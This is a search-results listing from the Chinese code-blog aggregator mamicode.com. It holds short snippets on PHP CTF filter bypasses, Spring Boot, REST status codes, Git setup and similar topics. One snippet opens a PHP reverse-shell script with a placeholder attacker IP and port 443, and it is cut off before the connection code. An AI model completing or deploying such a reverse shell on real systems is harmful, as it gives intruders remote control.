码迷,mamicode.com
首页 >  
搜索关键字:get set 设置模板    ( 126201个结果
php_bugs学习 02 绕过过滤的空白字符
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
分类:Web程序   时间:2021-07-05 19:06:03    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
IDEA搭建一个SpringBoot项目——十分详细(web+mysql)
本博客记录了IDEA中使用Springboot框架搭建一个web+mysql项目的详细过程,适合springboot初学者学习。 ...
分类:数据库   时间:2021-07-05 18:53:16    阅读次数:0
自定义一个自己的业务异常
自定义一个自己的业务异常 具体代码如下 @EqualsAndHashCode(callSuper = true) @Data public class ServiceException extends RuntimeException { private Integer code; private ...
分类:其他好文   时间:2021-07-05 18:24:18    阅读次数:0
RESTful规范与常用状态码
阅读目录 GET POST PUT DELETE 回到顶部 GET 安全且幂等 获取表示 变更时获取表示(缓存) 200(OK)-表示已在响应中发出 204(无内容) - 资源有空表示 301(Moved Permanently) - 资源的URI已被更新 303 (See Other) -其他(如 ...
分类:其他好文   时间:2021-07-05 18:23:37    阅读次数:0
jq 如何获取多选框选中的值
jquery如何获取多选框选中的值,有两种方法 1、通过id获取是否选中(单个) 1)引入jquery文件 2)Html设计如下 <div> <span>运动类:</span> <div id="div1" style="position:relative;left:80px;margin-top: ...
分类:其他好文   时间:2021-07-05 18:22:03    阅读次数:0
Test Blog Use
Test I get 10 times more traffic from [Google] [1] than from [Yahoo] [2] or [MSN] [3]. ? [1]: http://google.com/ "Google" [2]: http://search.yahoo.com ...
分类:其他好文   时间:2021-07-05 18:14:09    阅读次数:0
C# Post 使用(multipart/form-data)请求数据
public static string HttpPostMultipartFormData(string url, NameValueCollection kVDatas, string method = WebRequestMethods.Http.Post, string encoding= ...
分类:Windows程序   时间:2021-07-05 18:04:31    阅读次数:0
Windows系统 安装git + 生成SSH key
最近想整一个小的开源项目,因此需要使用GitHub来存放代码。为了方便GitHub和本地之间进行代码的上传和下载,需要设置SSH key。 本文章主要包括 安装git 和生成 SSH key 并在GitHub上设置 SSH key。 前提:已经有GitHub账号。 安装 git 1. git 下载 ...
分类:Windows程序   时间:2021-07-05 17:45:19    阅读次数:0
Git学习
参见: https://git-scm.com/book/zh/v2 https://www.liaoxuefeng.com/wiki/896043488029600 ...
分类:其他好文   时间:2021-07-05 17:30:18    阅读次数:0
126201条   上一页 1 ... 3 4 5 6 7 ... 12621 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!